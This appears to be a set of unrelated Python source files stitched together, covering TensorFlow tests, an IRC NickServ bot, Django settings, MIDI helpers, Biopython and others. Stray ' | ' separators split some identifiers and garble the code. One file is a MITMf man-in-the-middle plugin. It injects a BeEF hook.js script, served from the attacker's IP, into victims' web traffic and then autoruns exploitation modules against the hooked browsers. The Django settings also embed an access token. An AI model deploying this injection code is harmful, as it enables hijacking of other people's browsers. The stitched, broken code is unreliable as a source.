node { name: "a" op: "Const" device: "/task:0"}
node { name: "b" op: "Const" device: "/task:0"}
node { name: "c" op: "Const" device: "/task:1"}
node { name: "d" op: "Const" device: "/task:1"}
node { name: "root/NoOp" op: "NoOp" input: "^a" input: "^b"
device: "/task:0" }
node { name: "root/NoOp_1" op: "NoOp" input: "^c" input: "^d"
device: "/task:1" }
no | de { name: "root" op: "NoOp" input: "^root/NoOp" input: "^root/NoOp_1"
device: "/task:2" }
""", self._StripGraph(gd))
class ShapeTestCase(T | ensorFlowTestCase):
def testShape(self):
with ops.Graph().as_default():
tensor = tf.constant([1.0, 2.0])
self.assertEquals([2], tensor.get_shape())
self.assertEquals([2],
control_flow_ops.with_dependencies(
[tf.constant(1.0)], tensor).get_shape())
if __name__ == "__main__":
googletest.main()
|
#!/usr/bin/python3
'''
This is a * sort * of static method but is ugly since the
function is really global and not in the class.
'''
class Book:
num = 0
def __init__(self, price):
self.__price = price
B | ook.num += 1
def printit(self):
print('price is', self.__price)
def setPrice(self, newprice):
self.__price = newprice
def getNumBooks():
return Book.num
# lets create some books...
b1 = Book(14)
b2 = Book(13)
# lets access the static member and the static methods...
print('Book.num (direct access) is ', Book.num)
print('getNumBooks() is ', getNumBooks())
try:
print(b1.getNumBooks())
except AttributeError as e:
print('no,cannot access the sta | tic method via the instance')
# access the static member through an instance...
print(b1.num)
print(b2.num)
b3 = Book(12)
print(b1.num)
print(b2.num)
print(b3.num)
|
# -*- coding: utf-8 -*-
import bot
import time
"""
load irc/auth/nickserv
nickserv set password hunter2
config set modules.nickserv.enabled True
config set modules.nickserv.ghost True
nickserv register email@do.main
nickserv verify register myaccount c0d3numb3r
nickserv identify
"""
class M_NickServ(bot.Module):
index = "nickserv"
def register(self):
self.addhook("recv", "recv", self.recv)
self.addhook("login", "login", self.login)
self.addhook("nickinuse", "433", self.nickinuse)
self.addsetting("=name", "")
self.addsetting("=password", "")
self.addsetting("enabled", False)
self.addsetting("auto", True)
self.addsetting("ghost", True)
self.lastns = ""
self.lastnstime = time.time()
self.ghosting = True
self.addcommand(self.register_c, "register",
"Register with NickServ.",
["[-name=account name]", "email"])
self.addcommand(self.verify_c, "verify register",
"Verify with NickServ.", ["account", "code"])
self.addcommand(self.identify_c, "identify",
"Identify with NickServ.", [])
self.addcommand(self.setp, "set password",
"Set the NickServ pass | word.", ["password"])
self.addcommand(self.setn, "set name",
"Set the NickServ name.", ["[name]"])
def setn(self, context, args):
args.default("name", "")
self.setsetting("name", args.getstr("name"))
return "Set name to: %s" % self.getsetting | ('name')
def setp(self, context, args):
args.default("password", "")
self.setsetting("password", args.getstr("password"))
return "Set password to: %s" % self.getsetting('password')
def name(self):
return self.getsetting("name") or self.server.settings.get(
'server.user.nick')
def recv(self, context):
if context.user[0]:
if context.code('notice') and context.user[0].lower() == 'nickserv':
if context.reciever == self.server.nick:
if self.lastns and time.time() - self.lastnstime < 30:
self.server.sendto("NOTICE", self.lastns,
"NickServ -- %s" % (
context.text,
))
if self.ghosting:
self.server.setnick(self.server.wantnick)
self.ghosting = False
def nickinuse(self, r):
if (self.getsetting("enabled") and
self.getsetting("password") and self.getsetting("ghost")):
self.server.setnick(self.server.nick + "_")
self.server.sendto("PRIVMSG", "nickserv", "GHOST %s %s" % (
self.server.wantnick,
self.getsetting("password"),
))
self.ghosting = True
r.append(True)
def identify(self):
self.server.log("AUTH", "Identifying with NickServ.")
self.server.sendto("PRIVMSG", "nickserv", "IDENTIFY %s %s" % (
self.name(),
self.getsetting("password"),
))
def identify_c(self, context, args):
context.exceptrights(["admin"])
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.identify()
self.lastns = context.user[0]
self.lastnstime = time.time()
def register_c(self, context, args):
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.server.sendto("PRIVMSG", "nickserv", "REGISTER %s %s %s" % (
self.name() if args.getbool('name') else '',
self.getsetting("password"),
args.getstr('email'),
))
self.lastns = context.user[0]
self.lastnstime = time.time()
def verify_c(self, context, args):
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.server.sendto("PRIVMSG", "nickserv", "VERIFY REGISTER %s %s" % (
args.getstr('account'),
args.getstr('code'),
))
self.lastns = context.user[0]
self.lastnstime = time.time()
def login(self):
if self.getsetting("enabled") and self.getsetting("password"):
if self.getsetting("auto"):
self.identify()
bot.register.module(M_NickServ)
|
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write | to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
import json
import threading
from time import sleep
from core.beefapi import BeefAPI
from core.utils import SystemConfig, shutdown
from plugins.plugin import Plugin
from plugins.Inject import Inject
mitmf_logger = logging.getLogger("mitmf")
class BeefAutorun(Inject, Plugin):
name = "BeEFAutorun"
optname = "beefauto"
desc = "Injects B | eEF hooks & autoruns modules based on Browser and/or OS type"
version = "0.3"
has_opts = False
def initialize(self, options):
self.options = options
self.ip_address = SystemConfig.getIP(options.interface)
Inject.initialize(self, options)
self.tree_info.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
beefconfig = self.config['MITMf']['BeEF']
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[BeEFAutorun] Error logging in to BeEF!")
def startThread(self):
self.autorun()
def onConfigChange(self):
self.initialize(self.options)
def autorun(self):
already_ran = []
already_hooked = []
while True:
mode = self.config['BeEFAutorun']['mode']
for hook in self.beef.hooked_browsers.online:
if hook.session not in already_hooked:
mitmf_logger.info("{} [BeEFAutorun] Joined the horde! [id:{}, type:{}-{}, os:{}]".format(hook.ip, hook.id, hook.name, hook.version, hook.os))
already_hooked.append(hook.session)
self.black_ips.append(hook.ip)
if mode == 'oneshot':
if hook.session not in already_ran:
self.execModules(hook)
already_ran.append(hook.session)
elif mode == 'loop':
self.execModules(hook)
sleep(10)
sleep(1)
def execModules(self, hook):
all_modules = self.config['BeEFAutorun']["ALL"]
targeted_modules = self.config['BeEFAutorun']["targets"]
if all_modules:
mitmf_logger.info("{} [BeEFAutorun] Sending generic modules".format(hook.ip))
for module, options in all_modules.iteritems():
for m in self.beef.modules.findbyname(module):
resp = m.run(hook.session, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
else:
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
sleep(0.5)
if (hook.name and hook.os):
for os in targeted_modules:
if (os == hook.os) or (os in hook.os):
mitmf_logger.info("{} [BeEFAutorun] Sending targeted modules".format(hook.ip))
for browser in targeted_modules[os]:
if browser == hook.name:
for module, options in targeted_modules[os][browser].iteritems():
for m in self.beef.modules.findbyname(module):
resp = m.run(hook.session, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
else:
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
sleep(0.5)
|
import logging
from abc import abstractmethod, ABCMeta
from urllib import request
class UrlShortener(meta | class=ABCMeta):
@abstractmethod
def shorten(self, url: str) -> str:
pass
def log(self, url):
logging.info("Short URL: {}".format(url))
class Off(UrlShortener):
def shorten(self, url: str):
return url
class TinyURL(UrlShortener):
def shorten(self, url: str) -> str:
response = request.urlopen("http://tinyurl.com/api-create.php?url={}".format(url))
url = str(response.read(), encoding="ascii")
self.log(url)
return url
def get | _url_shortener(name: str) -> UrlShortener:
if name == "tinyurl":
return TinyURL()
return Off()
|
R), 'templates')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_TEMPLATE_DIR,
os.path.join(BASE_TEMPLATE_DIR, 'allauth')],
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader'
],
},
},
]
AUTHENTICATION_BACKENDS = [
'core.backends.Auth',
'django.contrib.auth.backends.ModelBackend',
'accounts.backends.AuthenticationBackend',
'accounts.backends.PhoneAuthenticationBackend'
]
ACCOUNT_AUTHENTICATION_METHOD = 'username_email'
DJOSER = {
'SITE_NAME': SITE_NAME,
'SET_PASSWORD_RETYPE': True,
'PASSWORD_RESET_CONFIRM_RETYPE': True,
'PASSWORD_RESET_CONFIRM_URL':
'account/password/reset/confirm/{uid}/{token}',
'ACTIVATION_URL': 'account/activate/{uid}/{token}',
# 'SEND_ACTIVATION_EMAIL': True,
'SERIALIZERS': {
'set_password_retype': 'accounts.serializers.ChangePasswordSerializer'
}
}
CORS_ORIGIN_ALLOW_ALL = False
LOGIN_REDIRECT_URL = '/dashboard/'
LOGIN_URL = '/account/login/'
LOGOUT_URL = '/account/logout/'
WSGI_APPLICATION = 'config.wsgi.application'
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = LOGIN_URL
ACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS = 2
ACCOUNT_FORMS = {
'signup': 'accounts.forms.RegisterForm',
'profile': 'accounts.forms.ProfileForm',
}
ACCOUNT_ADAPTER = 'accounts.adapter.DefaultAccoun | tAdapter'
ACCOUNT_LOGOUT_ON_GET = True
ACCOUNT_LOGOUT_REDIRECT_URL = LOGIN_URL
ACCOUNT_LOGIN_ATTEMPTS_TIMEOUT = 86400
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': ('django.contrib.auth.'
'password_validation.UserAttributeSimilarityValidator'),
},
{
'NAME':
'django.contrib.auth.password_validation.MinimumLengthValidator',
'OPTIONS': {
'min_length': 10,
}
},
{
'NAME':
' | django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.NumericPasswordValidator',
},
{
'NAME':
'accounts.validators.CharacterTypePasswordValidator'
},
{
'NAME':
'accounts.validators.EmailSimilarityValidator'
},
]
OSM_ATTRIBUTION = _(
"Base map data © <a href=\"http://openstreetmap.org\">"
"OpenStreetMap</a> contributors under "
"<a href=\"http://opendatacommons.org/licenses/odbl/\">ODbL</a>"
)
DIGITALGLOBE_ATTRIBUTION = _("Imagery © DigitalGlobe")
DIGITALGLOBE_TILESET_URL_FORMAT = (
'https://{{s}}.tiles.mapbox.com/v4/digitalglobe.{}'
'/{{z}}/{{x}}/{{y}}.png?access_token='
'pk.eyJ1IjoiZGlnaXRhbGdsb2JlIiwiYSI6ImNpaHhtenBmZjAzYW1'
'1a2tvY2p3MnpjcGcifQ.vF1gH0mGgK31yeHC1k1Tqw'
)
LEAFLET_CONFIG = {
'TILES': [
(
_("OpenStreetMap"),
'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',
{'attribution': OSM_ATTRIBUTION,
'maxZoom': 19}
),
(
_("+Vivid imagery"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('n6ngnadl'),
{'attribution': DIGITALGLOBE_ATTRIBUTION,
'maxZoom': 22}
),
(
_("Recent imagery"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('nal0g75k'),
{'attribution': DIGITALGLOBE_ATTRIBUTION,
'maxZoom': 22}
),
(
_("+Vivid imagery with OpenStreetMap"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('n6nhclo2'),
{'attribution': (OSM_ATTRIBUTION, DIGITALGLOBE_ATTRIBUTION),
'maxZoom': 22}
),
(
_("Recent imagery with OpenStreetMap"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('nal0mpda'),
{'attribution': (OSM_ATTRIBUTION, DIGITALGLOBE_ATTRIBUTION),
'maxZoom': 22}
),
],
'RESET_VIEW': False,
'PLUGINS': {
'draw': {
'js': '/static/leaflet/draw/leaflet.draw.js'
},
'groupedlayercontrol': {
'js': '/static/js/leaflet.groupedlayercontrol.min.js',
'css': '/static/css/leaflet.groupedlayercontrol.min.css'
}
}
}
# Invalid names for Cadasta organizations, projects, and usernames
CADASTA_INVALID_ENTITY_NAMES = ['add', 'new']
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
LOCALE_PATHS = [os.path.join(BASE_DIR, 'locale')]
LANGUAGES = [
# ('ar', _('Arabic')), (hiding until RTL support fixed)
('en', _('English')),
('fr', _('French')),
# ('de', _('German')), (hiding until translation coverage >= 75%)
('es', _('Spanish')),
('id', _('Indonesian')),
('it', _('Italian')),
('pt', _('Portuguese'))
# ('sw', _('Swahili')), (hiding until translation coverage >= 75%)
]
MEASUREMENT_DEFAULT = 'metric'
MEASUREMENTS = [
('metric', _('Metric')),
('imperial', _('Imperial')),
]
DEFAULT_AVATAR = '/static/img/avatar_sm.jpg'
ACCEPTED_AVATAR_TYPES = ['image/png', 'image/jpeg']
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
MEDIA_ROOT = '/opt/cadasta/media'
MEDIA_URL = '/media/'
STATIC_ROOT = '/opt/cadasta/static'
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'sass_processor.finders.CssFinder',
'compressor.finders.CompressorFinder',
)
# Required for bootstrap-sass
# https://github.com/jrief/django-sass-processor
SASS_PRECISION = 8
SASS_PROCESSOR_ROOT = os.path.join(STATIC_ROOT, 'cache')
SASS_PROCESSOR_INCLUDE_DIRS = (
'/opt/cadasta/node_modules',
)
SASS_OUTPUT_STYLE = 'compressed'
# django-compressor
# https://django-compressor.readthedocs.io/en/latest/
# change to false for debug
COMPRESS_ENABLED = True
COMPRESS_CSS_FILTERS = (
'compressor.filters.css_default.CssAbsoluteFilter',
'compressor.filters.cssmin.CSSMinFilter',
)
COMPRESS_URL = STATIC_URL
COMPRESS_ROOT = STATIC_ROOT
COMPRESS_STORAGE = 'compressor.storage.GzipCompressorFileStorage'
COMPRESS_OUTPUT_DIR = 'cache'
JSONATTRS_SCHEMA_SELECTORS = {
'spatial.spatialunit': (
'project.organization.pk',
'project.pk', 'project.current_questionnaire'
),
'spatial.spatialrelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
),
'party.party': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire',
'type'
),
'party.partyrelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
),
'party.tenurerelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
)
}
ATTRIBUTE_GROUPS = {
'location_attributes': {
'app_label': 'spatial',
'model': 'spatialunit',
'label': 'Location'
},
'party_attributes': {
'app_label': 'party',
'model': 'party',
'label': 'Party'
},
'location_relationship_attributes': {
'app_label': 'spatial',
'model': 'spatialrelationship',
'label': 'Spatial relationship'
},
'party_relationship_attributes': {
'app_label': 'party',
'model': 'partyrelationship',
'label': 'Party relationship'
},
'tenure_relationship_attributes': {
'app_label': 'party',
'model': 'tenurerelationship',
'label': 'Tenure Relationship'
}
}
ICON_URL = ('https://s3-us-west-2.amazonaws.com/cadasta-resources'
'/icons/{} |
"""
Base class for all nodes in the scene graph. It is implemented
using the composite pattern.
Responsibilities:
- Hold the relative position to its parent.
- Blit itself on the parent.
- Dirty flag itself to trigger regeneration of surface.
"""
class Component(object):
def __init__(self):
self._position = (0, 0)
self._dirty = True
self._surface = None
def draw(self, parent):
self._recreate_surface()
if self._surface and parent:
parent.blit(self._surface, self._position)
def set_position(self, position):
self._position = position
de | f surface(self):
return None
def dirty(self):
self._dirty = True
def _recreate_surface(self):
if self._dirty:
| self._surface = self.surface()
self._dirty = False
"""
Decorator to mark component methods that change the look
of the surface and therefor need to trigger regeneration.
"""
def recreate_surface(function):
def wrapper(self, *args):
self.dirty()
return function(self, *args)
return wrapper
|
from Bio import Entrez
from Bio import SeqIO
from Bio import Seq
from Bio.Alphabet import IUPAC
genomes | = ["Escherichia coli str. K-12 substr. MC4100 complete genome","Escherichia coli Nissle 1917, complete genome","Escherichia coli LY180, complete genome"]
genomes_short = ["K12","Nissle","LY180"]
for n,genome in enumerate(genomes):
Entrez.email = "fake@drexel.edu"
handle = Entrez.esearch(db="nucleotide", term=genome)
records = Entrez.r | ead(handle)
handle.close()
handle = Entrez.efetch(db="nucleotide", id=records['IdList'][0], rettype="gb", retmode="text")
record = SeqIO.read(handle, "genbank")
handle.close()
mygenes = ["thrA","mogA","dnaK","nhaA","ksgA"]
output_handle=open("seq"+str(n+1)+".fna","w")
for feature in record.features:
if feature.type=='CDS':
if 'gene' in feature.qualifiers:
if feature.qualifiers['gene'][0] in mygenes:
output_handle.write(">%s_%s\n%s\n" % (feature.qualifiers['gene'][0], genomes_short[n], str(feature.extract(record.seq))))
output_handle.close()
|
from pylons_common.lib.log import create_logger
from pylons_common.lib.utils import pluralize
logger = create_logger('pylons_common.lib.datetime')
from datetime import datetime, timedelta
DATE_FORMAT_ACCEPT = [u'%Y-%m-%d %H:%M:%S', u'%Y-%m-%d %H:%M:%SZ', u'%Y-%m-%d', u'%m-%d-%Y', u'%m/%d/%Y', u'%m.%d.%Y', u'%b %d, %Y']
popular_timezones = [u'US/Eastern', u'US/Central', u'US/Mountain', u'US/Pacific', u'US/Alaska', u'US/Hawaii', u'US/Samoa',
u'Europe/London', u'Europe/Paris', u'Europe/Istanbul', u'Europe/Moscow',
u'America/Puerto_Rico', u'America/Buenos_Aires', u'America/Sao_Paulo',
u'Asia/Dubai', u'Asia/Calcutta', u'Asia/Rangoon', u'Asia/Bangkok', u'Asia/Hong_Kong', u'Asia/Tokyo',
u'Australia/Brisbane', u'Australia/Sydney',
u'Pacific/Fiji']
def convert_date(value):
"""
converts a string into a datetime object
"""
if not value:
return None
if isinstance(value, datetime):
return value
def try_parse(val, format):
try:
dt = datetime.strptime(val, format)
except ValueError:
dt = None
return dt
converted_value = None
for format in DATE_FORMAT_ACCEPT:
converted_value = converted_value or try_parse(value, format)
if not converted_value:
raise ValueError('Cannot convert supposed date %s' % value)
return converted_value
def get_timezones():
import pytz
timezones = {0:u'UTC'}
for tzname in pytz.common_timezones:
tzname = tzname.decode('utf-8')
tz = pytz.timezone(tzname)
dt = datetime.utcnow()
# in theory, this is more elegant, but tz.dst (timezone daylight savings - 0 if off 1 if on) is returning 0 for everything
#offset = tz.utcoffset(dt) - tz.dst(dt)
# we do this try/except to avoid the possibility that pytz fails at localization
# see https://bugs.launchpad.net/pytz/+bug/207500
try:
offset = dt.replace(tzinfo=pytz.utc) - tz.localize(dt)
seconds = offset.days * 86400 + offset.seconds
minutes = seconds / 60
hours = minutes / 60
# adjust for offsets that are greater than 12 hours (these are repeats of other offsets)
if hours > 12:
hours = hours - 24
elif hours < -11:
hours = hours + 24
this_tz = timezones.get(hours, None)
if not this_tz:
timezones[hours] = tzname
elif tzname in popular_timezones:
# overwrite timezones with popular ones if equivalent
timezones[hours] = tzname
except:
logger.exception("Localization failure for timezone " + tzname)
return timezones
def relative_date_str(date, now=None, time=False):
'''
Will return a string like 'Today', 'Tomorrow' etc.
'''
if not now: now = datetime.utcnow()
if not date: return 'unknown'
diff = date.date() - now.date()
def day_time(day_str):
return '%s%s' % (day_str, time and ' at %s' % date.strftime("%I:%M %p") or '')
if diff.days == 0:
return day_time('Today')
elif diff.days == -1:
return day_time('Yesterday')
elif diff.days == 1:
return day_time('Tomorrow')
| elif diff.days < 0 and diff.days >= -7:#Within one week back
return '%s ago' % pluralize(-diff.days, '{0} days', '1 day')
| elif diff.days > 0 and diff.days < 7:#Within one week back
return 'in %s' % pluralize(diff.days, '{0} days', '1 day')
else:
return date.strftime("%b %e, %Y")## on 10/03/1980
def now():
return datetime.utcnow() |
#
# This file contains functions and constants to talk
# to and from a Novation Launchpad via MIDI.
#
# Created by paul for mididings.
from mididings import *
# MEASURES - constants useful for the Pad
side = list(range(0, 8))
longside = list(range(0, 9))
step = 16 # vertical gap on pad
FirstCtrl = 104 # ctrl of first toprow key
# COLORS
# Colors on the Launchpad are determined by event velocity/value.
# Each key can be lit with red or green light (or both),
# with brightness 0 (off) - 3 (max).
# For convenience, define also the constants:
black = 4 # better not to use zero
red = 3
orange = 19
green = 48
yellow = 51 # better not to use 127
# If you want a darker variant of the above, use fractions (thirds).
# For example, green*2/3 is darker green. (Not for orange!)
def color(g, r):
"This gives the Launchpad color given the amount of green and red."
if g + r == 0:
return black # not zero
else:
return (16 * g) + r
# KEYS
# Each key on the Launchpad is activated by a MIDI event.
# The square keys and the right keys are notes,
# the top keys are control events.
# Rows and columns given the keys (starting from 0)
def row(x):
"This tells the row of the event (square or right)"
return x // step
def column(x):
"This tells us the column of event (right = 8)"
return x % step
def topcol(x):
"The same as colums, but for the top row"
return x - FirstCtrl
# Now the inverses: functions that point exactly to a key on the Launchpad
def right(row):
"This gives the note of a right key at position row"
return (row * step) + 8
def square(row, col):
"This gives the note of a square key at position row,col"
return (row * step) + col
def top(col):
"This gives the ctrl of a top key at position col"
return col + FirstCtrl
# KEY FILTERS
# First filters for notes from square, top, and right keys.
OnlySquare = Filter(NOTE) >> KeyFilter(notes=[square(i, j)
for i in side for j in side])
OnlyRight = KeyFilter(notes=[right(i) for i in side])
OnlyTop = Filter(CTRL) >> CtrlFilter(FirstCtrl + i for i in side)
# Now filters for rows, colums, and single keys.
def RowSqFilter(row):
"This selects only notes from specified row"
return KeyFilter(row * step, right(row)) # no right
def RowFilter(row):
"This selects only notes from specified row"
return KeyFilter(row * step, right(row) + 1) # also right
def ColumnFilter(col):
"This selects only notes from specified column"
return KeyFilter(notes=[square(i, col) for i in side])
def TopFilter(col):
"This selects only specified key from top row"
return CtrlFilter(top(col))
def RightFilter(row):
"This selects only specified key from right"
return KeyFilter(right(row))
def SquareFilter(row, col):
"This selects only specified key from square"
return KeyFilter(square(row, col))
# KEY GENERATORS
def SquareKey(row, col):
"This creates square note with given row and column"
return Key(square(row, col))
def RightKey(row):
"This creates right note with given row"
return Key(right(row))
def TopKey(col, val):
"This creates top ctrl with given column"
return Ctrl(top(col), val)
# NOTES
A = 21
B = 23
C = 24
D = 26
E = 28
F = 29
G = 31
Octave = 12 # semitones
minors = { # scale
0: 0, # interval in semitones
1: 2,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 12,
}
minharms = { # scale
0: 0, # interval in semitones
1: 2,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 11, # harmonic
}
majors = {
0: 0,
1: 2,
2: 4,
3: 5,
4: 7,
5: 9,
6: | 11,
7: 12,
}
dorics = {
0: 0,
1: 2,
2: 3,
3: 5,
4: 7,
5: 9,
6: 10,
7: 12,
}
phrygians = {
0: 0,
1: 1,
2: 3,
| 3: 5,
4: 7,
5: 8,
6: 10,
7: 12,
}
# I only use these scales - feel free to add your own!
# Now the same thing, but to feed into Transpose:
Minor = [minors[i] - i for i in side]
MinHarm = [minharms[i] - i for i in side]
Major = [majors[i] - i for i in side]
Doric = [dorics[i] - i for i in side]
Phrygian = [phrygians[i] - i for i in side]
# How to use it in practice:
def OctFilter(col, tonic):
return KeyFilter(notes=[(tonic + col + (i * Octave)) for i in longside])
def MakeScale(tonic, scale):
return [OctFilter(i, tonic) >> Transpose(scale[i]) for i in side] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
# Copyright (C) 2017 Francisco Acosta <francisco.acosta@inria.fr>
# 2017 Freie Universität Berlin
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import sys
import time
from testrunner import run
US_ | PER_SEC = 1000000
INTERNAL_JITTER = 0.05
EXTERNAL_JITTER = 0.15
class InvalidTimeout(Exception):
pass
def testfunc(child):
child.expect(u"Running test (\\d+) times with (\\d+) distinct sleep times")
RUNS = int(child.match.group(1))
SLEEP_TIMES_NUMOF = int(child.match.group(2))
try:
child | .expect_exact(u"Please hit any key and then ENTER to continue")
child.sendline(u"a")
start_test = time.time()
for m in range(RUNS):
for n in range(SLEEP_TIMES_NUMOF):
child.expect(u"Slept for (\\d+) us \\(expected: (\\d+) us\\) Offset: (-?\\d+) us")
sleep_time = int(child.match.group(1))
exp = int(child.match.group(2))
upper_bound = exp + (exp * INTERNAL_JITTER)
if not (exp < sleep_time < upper_bound):
delta = (upper_bound-exp)
error = min(upper_bound-sleep_time, sleep_time-exp)
raise InvalidTimeout("Invalid timeout %d, expected %d < timeout < %d"
"\nHost max error\t%d\nerror\t\t%d" %
(sleep_time, exp, upper_bound,
delta, error))
testtime = (time.time() - start_test) * US_PER_SEC
child.expect(u"Test ran for (\\d+) us")
exp = int(child.match.group(1))
lower_bound = exp - (exp * EXTERNAL_JITTER)
upper_bound = exp + (exp * EXTERNAL_JITTER)
if not (lower_bound < testtime < upper_bound):
raise InvalidTimeout("Host timer measured %d us (client measured %d us)" %
(testtime, exp))
except InvalidTimeout as e:
print(e)
sys.exit(1)
if __name__ == "__main__":
sys.exit(run(testfunc))
|
from flask import g
import re
from sqlalchemy import and_
from sqlalchemy.orm.exc import NoResultFound
from newparp.model import (
CharacterTag,
Tag,
)
special_char_regex = re.compile("[\\ \\./]+")
underscore_strip_regex = re.compile("^_+|_+$")
def name_from_alias(alias):
# 1. Change to lowercase.
# 2. Change spaces to underscores.
# 3. Change . and / to underscores because they screw up the routing.
# 4. Strip extra underscores from the start and end.
return underscore_strip_regex.sub(
"",
special_char_regex.sub("_", alias)
).lower()
def character_tags_from_form(form):
tag_dict = {}
for tag_type in ("fandom", "character", "gender"):
for | alias in form[tag_type].split(","):
alias = alias.strip()
if alias == "":
continue
name = name_from_alias(alias)
if name == "":
continue
tag_dict[(tag_type, name)] = alias
character_tags = []
used_ids = set()
for (tag_type, name), alias in tag_dict.items():
try:
tag = g.db.query(Tag).filter( | and_(
Tag.type == tag_type, Tag.name == name,
)).one()
except NoResultFound:
tag = Tag(type=tag_type, name=name)
g.db.add(tag)
g.db.flush()
tag_id = (tag.synonym_id or tag.id)
# Remember IDs to skip synonyms.
if tag_id in used_ids:
continue
used_ids.add(tag_id)
character_tags.append(CharacterTag(tag_id=tag_id, alias=alias))
return character_tags
|
manager(bulk=False)
def test_removal_through_specified_gfk_related_manager(self, bulk=True):
Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True, favorite_thing=self.b1)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False, favorite_thing=self.b1)
# The fun manager DOESN'T remove boring people.
self.b1.favorite_things(manager='fun_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.favorite_things(manager='boring_people').remove(droopy, bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
droopy.favorite_thing = self.b1
droopy.save()
# The fun manager ONLY clears fun people.
self.b1.favorite_things(manager='fun_people').clear(bulk=bulk)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
self.assertQuerysetEqual(
self.b1.favorite_things(manager='fun_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
def test_slow_removal_through_specified_gfk_related_manager(self):
self.test_removal_through_specified_gfk_related_manager(bulk=False)
def test_removal_through_default_m2m_related_manager(self):
bugs = FunPerson.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.fun_authors.add(bugs)
droopy = FunPerson.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.fun_authors.add(droopy)
self.b1.fun_authors.remove(droopy)
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Bugs",
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
self.b1.fun_authors.remove(bugs)
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
self.b1.fun_authors.add(bugs)
self.b1.fun_authors.clear()
self.assertQuerysetEqual(
self.b1.fun_authors.through._default_manager.all(), [
"Droopy",
],
lambda c: c.funperson.first_name,
ordered=False,
)
def test_removal_through_specified_m2m_related_manager(self):
bugs = Person.objects.create(first_name="Bugs", last_name="Bunny", fun=True)
self.b1.authors.add(bugs)
droopy = Person.objects.create(first_name="Droopy", last_name="Dog", fun=False)
self.b1.authors.add(droopy)
# The fun manager DOESN'T remove boring people.
self.b1.authors(manager='fun_people').remove(droopy)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
"Droopy",
],
lambda c: c.first_name,
ordered=False,
)
# The boring manager DOES remove boring people.
self.b1.authors(manager='boring_people').remove(droopy)
self.assertQuerysetEqual(
self.b1.authors(manager='boring_people').all(), [
],
lambda c: c.first_name,
ordered=False,
)
